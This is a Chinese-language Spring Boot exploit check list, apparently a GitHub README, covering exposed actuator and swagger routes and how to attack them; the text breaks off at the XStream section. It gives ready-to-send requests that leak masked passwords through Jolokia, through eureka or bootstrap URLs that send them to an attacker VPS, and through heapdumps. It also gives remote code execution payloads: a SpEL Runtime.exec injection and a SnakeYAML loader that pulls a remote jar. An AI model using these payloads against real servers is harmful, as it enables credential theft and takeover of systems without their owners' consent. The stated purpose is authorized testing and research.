# Spring Boot Vulnerability Exploit Check List Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list ## 声明 > **⚠️ 本项目所有内容仅作为安全研究和授权测试使用, 相关人员对因误用和滥用该项目造成的一切损害概不负责** 目录 ----------------- * [Spring Boot Vulnerability Exploit Check List](#spring-boot-vulnerability-exploit-check-list) * [零:路由和版本](#零路由和版本) * [0x01:路由知识](#0x01路由知识) * [0x02:版本知识](#0x02版本知识) * [组件版本的相互依赖关系:](#组件版本的相互依赖关系) * [Spring Cloud 与 Spring Boot 版本之间的依赖关系:](#spring-cloud-与-spring-boot-版本之间的依赖关系) * [Spring Cloud 小版本号的后缀及含义:](#spring-cloud-小版本号的后缀及含义) * [一:信息泄露](#一信息泄露) * [0x01:路由地址及接口调用详情泄漏](#0x01路由地址及接口调用详情泄漏) * [0x02:配置不当而暴露的路由](#0x02配置不当而暴露的路由) * [0x03:获取被星号脱敏的密码的明文 (方法一)](#0x03获取被星号脱敏的密码的明文-方法一) * [利用条件:](#利用条件) * [利用方法:](#利用方法) * [步骤一: 找到想要获取的属性名](#步骤一-找到想要获取的属性名) * [步骤二: jolokia 调用相关 Mbean 获取明文](#步骤二-jolokia-调用相关-mbean-获取明文) * [0x04:获取被星号脱敏的密码的明文 (方法二)](#0x04获取被星号脱敏的密码的明文-方法二) * [利用条件:](#利用条件-1) * [利用方法:](#利用方法-1) * [步骤一: 找到想要获取的属性名](#步骤一-找到想要获取的属性名-1) * [步骤二: 使用 nc 监听 HTTP 请求](#步骤二-使用-nc-监听-http-请求) * [步骤三: 设置 eureka.client.serviceUrl.defaultZone 属性](#步骤三-设置-eurekaclientserviceurldefaultzone-属性) * [步骤四: 刷新配置](#步骤四-刷新配置) * [步骤五: 解码属性值](#步骤五-解码属性值) * [0x05:获取被星号脱敏的密码的明文 (方法三)](#0x05获取被星号脱敏的密码的明文-方法三) * [利用条件:](#利用条件-2) * [利用方法:](#利用方法-2) * [步骤一: 找到想要获取的属性名](#步骤一-找到想要获取的属性名-2) * [步骤二: 使用 nc 监听 HTTP 请求](#步骤二-使用-nc-监听-http-请求-1) * [步骤三: 触发对外 http 请求](#步骤三-触发对外-http-请求) * [步骤四: 刷新配置](#步骤四-刷新配置-1) * [0x06:获取被星号脱敏的密码的明文 (方法四)](#0x06获取被星号脱敏的密码的明文-方法四) * [利用条件:](#利用条件-3) * [利用方法:](#利用方法-3) * [步骤一: 找到想要获取的属性名](#步骤一-找到想要获取的属性名-3) * [步骤二: 下载 jvm heap 信息](#步骤二-下载-jvm-heap-信息) * [步骤三: 使用 MAT 获得 jvm heap 中的密码明文](#步骤三-使用-mat-获得-jvm-heap-中的密码明文) * [二:远程代码执行](#二远程代码执行) * [0x01:whitelabel error page SpEL RCE](#0x01whitelabel-error-page-spel-rce) * [利用条件:](#利用条件-4) * [利用方法:](#利用方法-4) * [步骤一:找到一个正常传参处](#步骤一找到一个正常传参处) * [步骤二:执行 SpEL 表达式](#步骤二执行-spel-表达式) * [漏洞原理:](#漏洞原理) * [漏洞分析:](#漏洞分析) * [漏洞环境:](#漏洞环境) * [0x02:spring cloud SnakeYAML RCE](#0x02spring-cloud-snakeyaml-rce) * [利用条件:](#利用条件-5) * [利用方法:](#利用方法-5) * [步骤一: 托管 yml 和 jar 文件](#步骤一-托管-yml-和-jar-文件) * [步骤二: 设置 spring.cloud.bootstrap.location 属性](#步骤二-设置-springcloudbootstraplocation-属性) * [步骤三: 刷新配置](#步骤三-刷新配置) * [漏洞原理:](#漏洞原理-1) * [漏洞分析:](#漏洞分析-1) * [漏洞环境:](#漏洞环境-1) * [0x03:eureka xstream deserialization RCE](#0x03eureka-xstream-deserialization-rce) * [利用条件:](#利用条件-6) * [利用方法:](#利用方法-6) * [步骤一:架设响应恶意 XStream payload 的网站](#步骤一架设响应恶意-xstream-payload-的网站) * [步骤二:监听反弹 shell 的端口](#步骤二监听反弹-shell-的端口) * [步骤三:设置 eureka.client.serviceUrl.defaultZone 属性](#步骤三设置-eurekaclientserviceurldefaultzone-属性) * [步骤四:刷新配置](#步骤四刷新配置) * [漏洞原理:](#漏洞原理-2) * [漏洞分析:](#漏洞分析-2) * [漏洞环境:](#漏洞环境-2) * [0x04:jolokia logback JNDI RCE](#0x04jolokia-logback-jndi-rce) * [利用条件:](#利用条件-7) * [利用方法:](#利用方法-7) * [步骤一:查看已存在的 MBeans](#步骤一查看已存在的-mbeans) * [步骤二:托管 xml 文件](#步骤二托管-xml-文件) * [步骤三:准备要执行的 Java 代码](#步骤三准备要执行的-java-代码) * [步骤四:架设恶意 ldap 服务](#步骤四架设恶意-ldap-服务) * [步骤五:监听反弹 shell 的端口](#步骤五监听反弹-shell-的端口) * [步骤六:从外部 URL 地址加载日志配置文件](#步骤六从外部-url-地址加载日志配置文件) * [漏洞原理:](#漏洞原理-3) * [漏洞分析:](#漏洞分析-3) * [漏洞环境:](#漏洞环境-3) * [0x05:jolokia Realm JNDI RCE](#0x05jolokia-realm-jndi-rce) * [利用条件:](#利用条件-8) * [利用方法:](#利用方法-8) * [步骤一:查看已存在的 MBeans](#步骤一查看已存在的-mbeans-1) * [步骤二:准备要执行的 Java 代码](#步骤二准备要执行的-java-代码) * [步骤三:托管 class 文件](#步骤三托管-class-文件) * [步骤四:架设恶意 rmi 服务](#步骤四架设恶意-rmi-服务) * [步骤五:监听反弹 shell 的端口](#步骤五监听反弹-shell-的端口-1) * [步骤六:发送恶意 payload](#步骤六发送恶意-payload) * [漏洞原理:](#漏洞原理-4) * [漏洞分析:](#漏洞分析-4) * [漏洞环境:](#漏洞环境-4) * [0x06:restart h2 database query RCE](#0x06restart-h2-database-query-rce) * [利用条件:](#利用条件-9) * [利用方法:](#利用方法-9) * [步骤一:设置 
spring.datasource.hikari.connection-test-query 属性](#步骤一设置-springdatasourcehikariconnection-test-query-属性) * [步骤二:重启应用](#步骤二重启应用) * [漏洞原理:](#漏洞原理-5) * [漏洞分析:](#漏洞分析-5) * [漏洞环境:](#漏洞环境-5) * [0x07:h2 database console JNDI RCE](#0x07h2-database-console-jndi-rce) * [利用条件:](#利用条件-10) * [利用方法:](#利用方法-10) * [步骤一:访问路由获得 jsessionid](#步骤一访问路由获得-jsessionid) * [步骤二:准备要执行的 Java 代码](#步骤二准备要执行的-java-代码-1) * [步骤三:托管 class 文件](#步骤三托管-class-文件-1) * [步骤四:架设恶意 ldap 服务](#步骤四架设恶意-ldap-服务-1) * [步骤五:监听反弹 shell 的端口](#步骤五监听反弹-shell-的端口-2) * [步骤六:发包触发 JNDI 注入](#步骤六发包触发-jndi-注入) * [漏洞分析:](#漏洞分析-6) * [漏洞环境:](#漏洞环境-6) * [0x08:mysql jdbc deserialization RCE](#0x08mysql-jdbc-deserialization-rce) * [利用条件:](#利用条件-11) * [利用方法:](#利用方法-11) * [步骤一:查看环境依赖](#步骤一查看环境依赖) * [步骤二:架设恶意 rogue mysql server](#步骤二架设恶意-rogue-mysql-server) * [步骤三:设置 spring.datasource.url 属性](#步骤三设置-springdatasourceurl-属性) * [步骤四:刷新配置](#步骤四刷新配置-1) * [步骤五:触发数据库查询](#步骤五触发数据库查询) * [步骤六:恢复正常 jdbc url](#步骤六恢复正常-jdbc-url) * [漏洞原理:](#漏洞原理-6) * [漏洞分析:](#漏洞分析-7) * [漏洞环境:](#漏洞环境-7) * [0x09:restart logging.config logback JNDI RCE](#0x09restart-loggingconfig-logback-jndi-rce) * [利用条件:](#利用条件-12) * [利用方法:](#利用方法-12) * [步骤一:托管 xml 文件](#步骤一托管-xml-文件) * [步骤二:托管恶意 ldap 服务及代码](#步骤二托管恶意-ldap-服务及代码) * [步骤三:设置 logging.config 属性](#步骤三设置-loggingconfig-属性) * [步骤四:重启应用](#步骤四重启应用) * [漏洞原理:](#漏洞原理-7) * [漏洞分析:](#漏洞分析-8) * [漏洞环境:](#漏洞环境-8) * [0x0A:restart logging.config groovy RCE](#0x0arestart-loggingconfig-groovy-rce) * [利用条件:](#利用条件-13) * [利用方法:](#利用方法-13) * [步骤一:托管 groovy 文件](#步骤一托管-groovy-文件) * [步骤二:设置 logging.config 属性](#步骤二设置-loggingconfig-属性) * [步骤三:重启应用](#步骤三重启应用) * [漏洞原理:](#漏洞原理-8) * [漏洞环境:](#漏洞环境-9) * [0x0B:restart spring.main.sources groovy RCE](#0x0brestart-springmainsources-groovy-rce) * [利用条件:](#利用条件-14) * [利用方法:](#利用方法-14) * [步骤一:托管 groovy 文件](#步骤一托管-groovy-文件-1) * [步骤二:设置 spring.main.sources 属性](#步骤二设置-springmainsources-属性) * [步骤三:重启应用](#步骤三重启应用-1) * [漏洞原理:](#漏洞原理-9) * [漏洞环境:](#漏洞环境-10) * [0x0C:restart spring.datasource.data h2 database RCE](#0x0crestart-springdatasourcedata-h2-database-rce) * [利用条件:](#利用条件-15) * [利用方法:](#利用方法-15) * [步骤一:托管 sql 文件](#步骤一托管-sql-文件) * [步骤二:设置 spring.datasource.data 属性](#步骤二设置-springdatasourcedata-属性) * [步骤三:重启应用](#步骤三重启应用-2) * [漏洞原理:](#漏洞原理-10) * [漏洞环境:](#漏洞环境-11) ## 零:路由和版本 ### 0x01:路由知识 - 有些程序员会自定义 `/manage`、`/management` 、**项目 App 相关名称**为 spring 根路径 - Spring Boot Actuator 1.x 版本默认内置路由的起始路径为 `/` ,2.x 版本则统一以 `/actuator` 为起始路径 - Spring Boot Actuator 默认的内置路由名字,如 `/env` 有时候也会被程序员修改,比如修改成 `/appenv` ### 0x02:版本知识 > Spring Cloud 是基于 Spring Boot 来进行构建服务,并提供如配置管理、服务注册与发现、智能路由等常见功能的帮助快速开发分布式系统的系列框架的有序集合。 #### 组件版本的相互依赖关系: | 依赖项 | 版本列表及依赖组件版本 | | -------------------------- | ------------------------------------------------------------ | | spring-boot-starter-parent | [spring-boot-starter-parent](https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-starter-parent) | | spring-boot-dependencies | [spring-boot-dependencies](https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-dependencies) | | spring-cloud-dependencies | [spring-cloud-dependencies](https://mvnrepository.com/artifact/org.springframework.cloud/spring-cloud-dependencies) | #### Spring Cloud 与 Spring Boot 版本之间的依赖关系: | Spring Cloud 大版本 | Spring Boot 版本 | | ------------------- | ------------------------------------ | | Angel | 兼容 Spring Boot 1.2.x | | Brixton | 兼容 Spring Boot 1.3.x、1.4.x | | Camden | 兼容 Spring Boot 1.4.x、1.5.x | | Dalston | 兼容 Spring Boot 1.5.x,不兼容 2.0.x | | Edgware | 兼容 Spring Boot 1.5.x,不兼容 2.0.x | | Finchley | 兼容 Spring Boot 2.0.x,不兼容 
1.5.x | | Greenwich | 兼容 Spring Boot 2.1.x | | Hoxton | 兼容 Spring Boot 2.2.x | #### Spring Cloud 小版本号的后缀及含义: | 小版本号后缀 | 含义 | | -------------- | --------------------------------------- | | BUILD-SNAPSHOT | 快照版,代码不是固定,处于变化之中 | | MX | 里程碑版 | | RCX | 候选发布版 | | RELEASE | 正式发布版 | | SRX | (修复错误和 bug 并再次发布的)正式发布版 | ## 一:信息泄露 ### 0x01:路由地址及接口调用详情泄漏 > 开发人员没有意识到地址泄漏会导致安全隐患或者开发环境切换为线上生产环境时,相关人员没有更改配置文件,忘记切换环境配置等 > 直接访问以下两个 swagger 相关路由,验证漏洞是否存在: ``` /v2/api-docs /swagger-ui.html ``` 其他一些可能会遇到的 swagger、swagger codegen、swagger-dubbo 等相关接口路由: ``` /swagger /api-docs /api.html /swagger-ui /swagger/codes /api/index.html /api/v2/api-docs /v2/swagger.json /swagger-ui/html /distv2/index.html /swagger/index.html /sw/swagger-ui.html /api/swagger-ui.html /static/swagger.json /user/swagger-ui.html /swagger-ui/index.html /swagger-dubbo/api-docs /template/swagger-ui.html /swagger/static/index.html /dubbo-provider/distv2/index.html /spring-security-rest/api/swagger-ui.html /spring-security-oauth-resource/swagger-ui.html ``` 除此之外,下面的 spring boot actuator 相关路由有时也会包含(或推测出)一些接口地址信息,但是无法获得参数相关信息: ``` /mappings /metrics /beans /configprops /actuator/metrics /actuator/mappings /actuator/beans /actuator/configprops ``` **一般来讲,暴露出 spring boot 应用的相关接口和传参信息并不能算是漏洞**,但是以 "**默认安全**" 来讲,不暴露出这些信息更加安全。 对于攻击者来讲,一般会仔细审计暴露出的接口以增加对业务系统的了解,并会同时检查应用系统是否存在未授权访问、越权等其他业务类型漏洞。 ### 0x02:配置不当而暴露的路由 > 主要是因为程序员开发时没有意识到暴露路由可能会造成安全风险,或者没有按照标准流程开发,忘记上线时需要修改/切换生产环境的配置 参考 [production-ready-endpoints](https://docs.spring.io/spring-boot/docs/1.5.10.RELEASE/reference/htmlsingle/#production-ready-endpoints) 和 [spring-boot.txt](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt),可能因为配置不当而暴露的默认内置路由可能会有: ``` /actuator /auditevents /autoconfig /beans /caches /conditions /configprops /docs /dump /env /flyway /health /heapdump /httptrace /info /intergrationgraph /jolokia /logfile /loggers /liquibase /metrics /mappings /prometheus /refresh /scheduledtasks /sessions /shutdown /trace /threaddump /actuator/auditevents /actuator/beans /actuator/health /actuator/conditions /actuator/configprops /actuator/env /actuator/info /actuator/loggers /actuator/heapdump /actuator/threaddump /actuator/metrics /actuator/scheduledtasks /actuator/httptrace /actuator/mappings /actuator/jolokia /actuator/hystrix.stream ``` 其中对寻找漏洞比较重要接口的有: - `/env`、`/actuator/env` GET 请求 `/env` 会直接泄露环境变量、内网地址、配置中的用户名等信息;当程序员的属性名命名不规范,例如 password 写成 psasword、pwd 时,会泄露密码明文; 同时有一定概率可以通过 POST 请求 `/env` 接口设置一些属性,间接触发相关 RCE 漏洞;同时有概率获得星号遮掩的密码、密钥等重要隐私信息的明文。 - `/refresh`、`/actuator/refresh` POST 请求 `/env` 接口设置属性后,可同时配合 POST 请求 `/refresh` 接口刷新属性变量来触发相关 RCE 漏洞。 - `/restart`、`/actuator/restart` 暴露出此接口的情况较少;可以配合 POST请求 `/env` 接口设置属性后,再 POST 请求 `/restart` 接口重启应用来触发相关 RCE 漏洞。 - `/jolokia`、`/actuator/jolokia` 可以通过 `/jolokia/list` 接口寻找可以利用的 MBean,间接触发相关 RCE 漏洞、获得星号遮掩的重要隐私信息的明文等。 - `/trace`、`/actuator/httptrace` 一些 http 请求包访问跟踪信息,有可能在其中发现内网应用系统的一些请求信息详情;以及有效用户或管理员的 cookie、jwt token 等信息。 ### 0x03:获取被星号脱敏的密码的明文 (方法一) > 访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果 #### 利用条件: - 目标网站存在 `/jolokia` 或 `/actuator/jolokia` 接口 - 目标使用了 `jolokia-core` 依赖(版本要求暂未知) #### 利用方法: ##### 步骤一: 找到想要获取的属性名 GET 请求目标网站的 `/env` 或 `/actuator/env` 接口,搜索 `******` 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。 ##### 步骤二: jolokia 调用相关 Mbean 获取明文 将下面示例中的 `security.user.password` 替换为实际要获取的属性名,直接发包;明文值结果包含在 response 数据包中的 `value` 键中。 - 调用 `org.springframework.boot` Mbean > 实际上是调用 org.springframework.boot.admin.SpringApplicationAdminMXBeanRegistrar 类实例的 getProperty 方法 spring 1.x ``` POST 
/jolokia Content-Type: application/json {"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]} ``` spring 2.x ``` POST /actuator/jolokia Content-Type: application/json {"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]} ``` - 调用 `org.springframework.cloud.context.environment` Mbean > 实际上是调用 org.springframework.cloud.context.environment.EnvironmentManager 类实例的 getProperty 方法 spring 1.x ``` POST /jolokia Content-Type: application/json {"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]} ``` spring 2.x ``` POST /actuator/jolokia Content-Type: application/json {"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]} ``` - 调用其他 Mbean > 目标具体情况和存在的 Mbean 可能不一样,可以搜索 getProperty 等关键词,寻找可以调用的方法。 ### 0x04:获取被星号脱敏的密码的明文 (方法二) #### 利用条件: - 可以 GET 请求目标网站的 `/env` - 可以 POST 请求目标网站的 `/env` - 可以 POST 请求目标网站的 `/refresh` 接口刷新配置(存在 `spring-boot-starter-actuator` 依赖) - 目标使用了 `spring-cloud-starter-netflix-eureka-client` 依赖 - 目标可以请求攻击者的服务器(请求可出外网) #### 利用方法: ##### 步骤一: 找到想要获取的属性名 GET 请求目标网站的 `/env` 或 `/actuator/env` 接口,搜索 `******` 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。 ##### 步骤二: 使用 nc 监听 HTTP 请求 在自己控制的外网服务器上监听 80 端口: ```bash nc -lvk 80 ``` ##### 步骤三: 设置 eureka.client.serviceUrl.defaultZone 属性 将下面 `http://value:${security.user.password}@your-vps-ip` 中的 `security.user.password` 换成自己想要获取的对应的星号 * 遮掩的属性名; `your-vps-ip` 换成自己外网服务器的真实 ip 地址。 spring 1.x ``` POST /env Content-Type: application/x-www-form-urlencoded eureka.client.serviceUrl.defaultZone=http://value:${security.user.password}@your-vps-ip ``` spring 2.x ``` POST /actuator/env Content-Type: application/json {"name":"eureka.client.serviceUrl.defaultZone","value":"http://value:${security.user.password}@your-vps-ip"} ``` ##### 步骤四: 刷新配置 spring 1.x ``` POST /refresh Content-Type: application/x-www-form-urlencoded ``` spring 2.x ``` POST /actuator/refresh Content-Type: application/json ``` ##### 步骤五: 解码属性值 正常的话,此时 nc 监听的服务器会收到目标发来的请求,其中包含类似如下 `Authorization` 头内容: ``` Authorization: Basic dmFsdWU6MTIzNDU2 ``` 将其中的 `dmFsdWU6MTIzNDU2`部分使用 base64 解码,即可获得类似明文值 `value:123456`,其中的 `123456` 即是目标星号 * 脱敏前的属性值明文。 ### 0x05:获取被星号脱敏的密码的明文 (方法三) #### 利用条件: - 通过 POST `/env` 设置属性触发目标对外网指定地址发起任意 http 请求 - 目标可以请求攻击者的服务器(请求可出外网) #### 利用方法: > 参考 UUUUnotfound 提出的 [issue-1](https://github.com/LandGrey/SpringBootVulExploit/issues/1),可以在目标发外部 http 请求的过程中,在 url path 中利用占位符带出数据 ##### 步骤一: 找到想要获取的属性名 GET 请求目标网站的 `/env` 或 `/actuator/env` 接口,搜索 `******` 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。 ##### 步骤二: 使用 nc 监听 HTTP 请求 在自己控制的外网服务器上监听 80 端口: ```bash nc -lvk 80 ``` ##### 步骤三: 触发对外 http 请求 - `spring.cloud.bootstrap.location` 方法(**同时适用于**明文数据中有特殊 url 字符的情况) spring 1.x ``` POST /env Content-Type: application/x-www-form-urlencoded spring.cloud.bootstrap.location=http://your-vps-ip/?=${security.user.password} ``` spring 2.x ``` POST /actuator/env Content-Type: application/json {"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/?=${security.user.password}"} ``` - `eureka.client.serviceUrl.defaultZone` 方法(**不适用于**明文数据中有特殊 url 字符的情况) spring 1.x ``` POST /env Content-Type: application/x-www-form-urlencoded 
eureka.client.serviceUrl.defaultZone=http://your-vps-ip/${security.user.password} ``` spring 2.x ``` POST /actuator/env Content-Type: application/json {"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/${security.user.password}"} ``` ##### 步骤四: 刷新配置 spring 1.x ``` POST /refresh Content-Type: application/x-www-form-urlencoded ``` spring 2.x ``` POST /actuator/refresh Content-Type: application/json ``` ### 0x06:获取被星号脱敏的密码的明文 (方法四) > 访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果 #### 利用条件: - 可正常 GET 请求目标 `/heapdump` 或 `/actuator/heapdump` 接口 #### 利用方法: ##### 步骤一: 找到想要获取的属性名 GET 请求目标网站的 `/env` 或 `/actuator/env` 接口,搜索 `******` 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。 ##### 步骤二: 下载 jvm heap 信息 > 下载的 heapdump 文件大小通常在 50M—500M 之间,有时候也可能会大于 2G `GET` 请求目标的 `/heapdump` 或 `/actuator/heapdump` 接口,下载应用实时的 JVM 堆信息 ##### 步骤三: 使用 MAT 获得 jvm heap 中的密码明文 参考 [文章](https://landgrey.me/blog/16/) 方法,使用 [Eclipse Memory Analyzer](https://www.eclipse.org/mat/downloads.php) 工具的 **OQL** 语句 ``` select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password")) 或 select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password")) ``` 辅助用 "**password**" 等关键词快速过滤分析,获得密码等相关敏感信息的明文。 ## 二:远程代码执行 > 由于 spring boot 相关漏洞可能是多个组件漏洞组合导致的,所以有些漏洞名字起的不太正规,以能区分为准 ### 0x01:whitelabel error page SpEL RCE #### 利用条件: - spring boot 1.1.0-1.1.12、1.2.0-1.2.7、1.3.0 - 至少知道一个触发 springboot 默认错误页面的接口及参数名 #### 利用方法: ##### 步骤一:找到一个正常传参处 比如发现访问 `/article?id=xxx` ,页面会报状态码为 500 的错误: `Whitelabel Error Page`,则后续 payload 都将会在参数 id 处尝试。 ##### 步骤二:执行 SpEL 表达式 输入 `/article?id=${7*7}` ,如果发现报错页面将 7*7 的值 49 计算出来显示在报错页面上,那么基本可以确定目标存在 SpEL 表达式注入漏洞。 由字符串格式转换成 `0x**` java 字节形式,方便执行任意代码: ```python # coding: utf-8 result = "" target = 'open -a Calculator' for x in target: result += hex(ord(x)) + "," print(result.rstrip(',')) ``` 执行 `open -a Calculator` 命令 ```java ${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))} ``` #### 漏洞原理: 1. spring boot 处理参数值出错,流程进入 `org.springframework.util.PropertyPlaceholderHelper` 类中 2. 此时 URL 中的参数值会用 `parseStringValue` 方法进行递归解析 3. 
### 0x06: Recovering the plaintext of asterisk-masked passwords (method four)

> When the /env endpoint is accessed, spring actuator replaces the values of properties whose names contain sensitive keywords (such as password or secret) with asterisks to mask them

#### Preconditions:

- The target's `/heapdump` or `/actuator/heapdump` endpoint can be requested normally with GET

#### Exploitation:

##### Step 1: find the property name you want to read

Send a GET request to the target's `/env` or `/actuator/env` endpoint and search for the `******` keyword to locate the name of the property whose value is masked with asterisks.

##### Step 2: download the JVM heap dump

> The downloaded heapdump file is usually between 50 MB and 500 MB, and can occasionally exceed 2 GB

Send a `GET` request to the target's `/heapdump` or `/actuator/heapdump` endpoint to download a live JVM heap dump of the application (a streaming-download sketch follows at the end of this section).

##### Step 3: extract the plaintext password from the heap with MAT

Following the approach in [this article](https://landgrey.me/blog/16/), use **OQL** queries in the [Eclipse Memory Analyzer](https://www.eclipse.org/mat/downloads.php) tool:

```
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
```

or

```
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))
```

to filter quickly on keywords such as "**password**" and recover the plaintext of passwords and other sensitive values.
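Because the dump in step 2 can run to hundreds of megabytes, it is worth streaming it to disk instead of buffering it in memory; a minimal sketch with `requests` (the target URL is a placeholder, and spring 1.x targets drop the `/actuator` prefix):

```python
import requests

# placeholder target; swap in the real host
url = "http://127.0.0.1:8080/actuator/heapdump"
with requests.get(url, stream=True, timeout=120) as resp:
    resp.raise_for_status()
    with open("heapdump", "wb") as fh:
        for chunk in resp.iter_content(chunk_size=1 << 20):  # 1 MB chunks
            fh.write(chunk)
```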
## Part 2: Remote code execution

> Since spring boot vulnerabilities can result from combinations of several component flaws, some of the names below are informal; they are chosen simply to tell the techniques apart

### 0x01: whitelabel error page SpEL RCE

#### Preconditions:

- spring boot 1.1.0-1.1.12, 1.2.0-1.2.7, or 1.3.0
- At least one endpoint and parameter name that triggers the default spring boot error page is known

#### Exploitation:

##### Step 1: find an endpoint that accepts a parameter

For example, if visiting `/article?id=xxx` renders a status-500 `Whitelabel Error Page`, all subsequent payloads are tried in the `id` parameter.

##### Step 2: execute a SpEL expression

Request `/article?id=${7*7}`. If the error page shows the computed value 49 for `7*7`, the target almost certainly has a SpEL expression injection vulnerability (a quick probe sketch follows at the end of this section).

Convert the command string into `0x**` Java byte literals to make arbitrary command execution easier:

```python
# coding: utf-8
result = ""
target = 'open -a Calculator'
for x in target:
    result += hex(ord(x)) + ","
print(result.rstrip(','))
```

Execute the `open -a Calculator` command:

```java
${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}
```

#### How it works:

1. spring boot fails while processing the parameter value and control flows into the `org.springframework.util.PropertyPlaceholderHelper` class
2. The parameter value from the URL is then parsed recursively by the `parseStringValue` method
3. Everything wrapped in `${}` is evaluated as a SpEL expression by the `resolvePlaceholder` method of the `org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration` class, yielding RCE

#### Vulnerability analysis:

[SpringBoot SpEL表达式注入漏洞-分析与复现](https://www.cnblogs.com/litlife/p/10183137.html)

#### Vulnerable environment:

[repository/springboot-spel-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce)

Normal access:

```
http://127.0.0.1:9091/article?id=66
```

Execute the `open -a Calculator` command:

```java
http://127.0.0.1:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}
```
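A hedged sketch of the step 2 probe in Python; the endpoint and parameter name are those of the demo environment above and will differ per target:

```python
import requests

# demo endpoint from the vulnerable environment; the parameter name is target-specific
resp = requests.get("http://127.0.0.1:9091/article", params={"id": "${7*7}"})
if "49" in resp.text:
    print("error page evaluated 7*7 -> likely SpEL injection")
```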
### 0x02: spring cloud SnakeYAML RCE

#### Preconditions:

- Properties can be set via POST to the target's `/env` endpoint
- The configuration can be reloaded via POST to the target's `/refresh` endpoint (the `spring-boot-starter-actuator` dependency is present)
- The target's `spring-cloud-starter` version is < 1.3.0.RELEASE
- The target can reach the attacker's HTTP server (outbound requests are possible)

#### Exploitation:

##### Step 1: host the yml and jar files

On a VPS you control, start a simple HTTP server, preferably on a common HTTP port (80, 443):

```bash
# quickly start an http server with python
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
```

Place a file named `example.yml` (the `yml` suffix matters) in the web root with the following content:

```yaml
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://your-vps-ip/example.jar"]
  ]]
]
```

Also place a file named `example.jar` in the web root containing the code to execute; see [yaml-payload](https://github.com/artsploit/yaml-payload) for how to write and compile it.

##### Step 2: set the spring.cloud.bootstrap.location property

spring 1.x

```
POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/example.yml
```

spring 2.x

```
POST /actuator/env
Content-Type: application/json

{"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/example.yml"}
```

##### Step 3: refresh the configuration

spring 1.x

```
POST /refresh
Content-Type: application/x-www-form-urlencoded
```

spring 2.x

```
POST /actuator/refresh
Content-Type: application/json
```

#### How it works:

1. The spring.cloud.bootstrap.location property is set to the URL of an external malicious yml file
2. The refresh makes the target fetch the yml file from the remote HTTP server and read its content
3. SnakeYAML has a deserialization vulnerability, so parsing the malicious yml content carries out the specified actions
4. First, `java.net.URL` is triggered to pull the malicious jar file from the remote HTTP server
5. Then the classes in the jar that implement the `javax.script.ScriptEngineFactory` interface are located and instantiated
6. Instantiating those classes executes the malicious code, yielding RCE

#### Vulnerability analysis:

[Exploit Spring Boot Actuator 之 Spring Cloud Env 学习笔记](https://b1ngz.github.io/exploit-spring-boot-actuator-spring-cloud-env-note/)

#### Vulnerable environment:

[repository/springcloud-snakeyaml-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springcloud-snakeyaml-rce)

Normal access:

```
http://127.0.0.1:9092/env
```
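The set-property-then-refresh sequence recurs in most of the techniques in this document, so a small helper is convenient; this is a hedged sketch (base URL, property name, and value are whatever the specific technique calls for):

```python
import requests

def set_property_and_refresh(base, name, value, spring2=True):
    """Set an actuator-exposed property, then refresh so it takes effect."""
    if spring2:
        requests.post(base + "/actuator/env", json={"name": name, "value": value})
        requests.post(base + "/actuator/refresh", json={})
    else:
        requests.post(base + "/env", data={name: value})
        requests.post(base + "/refresh", data={})

# e.g. steps 2 and 3 above, against the spring 1.x demo environment
set_property_and_refresh("http://127.0.0.1:9092", "spring.cloud.bootstrap.location",
                         "http://your-vps-ip/example.yml", spring2=False)
```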
### 0x03: eureka xstream deserialization RCE

#### Preconditions:

- Properties can be set via POST to the target's `/env` endpoint
- The configuration can be reloaded via POST to the target's `/refresh` endpoint (the `spring-boot-starter-actuator` dependency is present)
- The target's `eureka-client` version is < 1.8.7 (it is usually pulled in by the `spring-cloud-starter-netflix-eureka-client` dependency)
- The target can reach the attacker's HTTP server (outbound requests are possible)

#### Exploitation:

##### Step 1: stand up a site that answers with a malicious XStream payload

